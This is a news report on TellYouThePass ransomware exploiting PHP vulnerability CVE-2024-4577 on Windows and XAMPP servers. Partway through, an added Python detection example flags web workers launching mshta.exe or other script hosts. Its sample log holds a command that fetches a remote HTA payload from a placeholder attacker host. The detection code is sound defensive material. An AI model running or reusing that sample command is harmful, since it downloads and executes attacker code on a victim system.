Ransomware Gang Exploits Critical PHP Vulnerability, Infects Thousands of Servers in China and Japan

ICARO Media Group
14/06/2024 20h47

Security researchers have identified a ransomware strain known as TellYouThePass that has quickly taken advantage of a critical vulnerability in PHP. The vulnerability, designated CVE-2024-4577, allows attackers to execute malicious code on web servers because user-supplied input is converted into characters that pass malicious commands through to PHP.

As of Thursday, security firm Censys reported that its internet scans had detected 1,000 servers infected with the TellYouThePass ransomware, down from the 1,800 servers initially detected on Monday. Primarily located in China, these infected servers no longer display their normal content; instead they show the site's file directory, with every file encrypted and given a ".locked" extension.

The ransom note accompanying the encrypted files demands a payment of approximately $6,500 in exchange for the decryption key. Researchers speculate that the attackers are targeting servers in China and Japan because these locales appear to be the only ones confirmed to be vulnerable to the exploit.

The critical vulnerability was published on June 6, along with a security patch, but threat actors were quick to exploit it. Security firm Imperva reported that within 24 hours of the publication, exploits using the vulnerability were installing the TellYouThePass ransomware. The exploit utilized a Windows binary called mshta.exe to run an HTML application hosted on an attacker-controlled server, indicating a tactic known as "living off the land," where attackers blend in with normal OS functionality.
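The living-off-the-land pattern described above (a PHP CGI worker launching mshta.exe against a remotely hosted HTML application) is something defenders can look for in process-creation telemetry. The following is an added example, not code from the article or from Imperva or Censys; the one-JSON-object-per-line log format, the field names and the sample events are all constructed for illustration, and the hostname in the sample is a placeholder.

```python
# Added example: flag a web-server worker process spawning a script host,
# in particular mshta.exe pointed at a remote .hta file, as the article describes.
# Log format and field names below are assumptions, not a real product's schema.
from __future__ import annotations
import json
import re
from typing import Iterator, Optional

# Web-server worker images that should never launch script hosts.
WEB_WORKERS = {"php-cgi.exe", "php.exe", "httpd.exe", "apache.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "certutil.exe"}
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)

def parse_events(lines: str) -> Iterator[dict]:
    """Yield one event dict per non-empty JSON line; skip malformed lines."""
    for line in lines.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue

def classify(event: dict) -> Optional[str]:
    """Return a finding label for a suspicious event, or None if benign."""
    parent = event.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("command_line", "")
    if parent in WEB_WORKERS and image in SCRIPT_HOSTS:
        if image == "mshta.exe" and REMOTE_HTA.search(cmdline):
            return "web worker launched mshta.exe with remote HTA"
        return "web worker launched script host"
    return None

def scan(lines: str) -> list[tuple[int, str]]:
    """Run classify() over every event and return (pid, label) findings."""
    return [(e.get("pid", -1), label) for e in parse_events(lines)
            if (label := classify(e))]

# Constructed sample events (not real telemetry); attacker.example is a placeholder.
SAMPLE_LOG = r"""
{"pid": 4120, "image": "C:\\xampp\\php\\php-cgi.exe", "parent_image": "C:\\xampp\\apache\\bin\\httpd.exe", "command_line": "php-cgi.exe"}
{"pid": 4188, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\xampp\\php\\php-cgi.exe", "command_line": "mshta http://attacker.example/payload.hta"}
{"pid": 4201, "image": "C:\\Windows\\System32\\notepad.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "notepad.exe"}
"""

if __name__ == "__main__":
    for pid, label in scan(SAMPLE_LOG):
        print(f"pid {pid}: {label}")
```

On the sample, only the mshta.exe event is reported; the benign php-cgi.exe and notepad.exe events are ignored.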

Censys researchers noted a fluctuation in the number of infected sites since the attacks began on June 7. The count ranged from a low of 670 to a high of 1,800 infected servers on Monday. The researchers believe that the varying numbers may be due to some of the compromised servers going offline or being decommissioned. They also mentioned that there have been no observed ransom payments to the Bitcoin address listed in the ransom notes.

Surprisingly, a significant number of compromised servers were found to be running XAMPP, software that is not recommended for production systems; its maintainers explicitly state that it is unsuitable for such environments. Researchers estimate that approximately half of the compromised servers show signs of running XAMPP, but the actual number may be higher, as not all services explicitly disclose the software they use.

While XAMPP is the only platform confirmed to be vulnerable, security experts emphasize that all Windows systems running PHP should install the necessary security update immediately. To assist administrators, the Imperva post provides IP addresses, file names, and file hashes that can be used to identify potential targets of the attacks.

As the TellYouThePass ransomware continues to affect servers in China and Japan, it serves as a stark reminder of the importance of promptly addressing critical vulnerabilities and implementing security updates to protect against malicious attacks.

The views expressed in this article do not reflect the opinion of ICARO, or any of its affiliates.
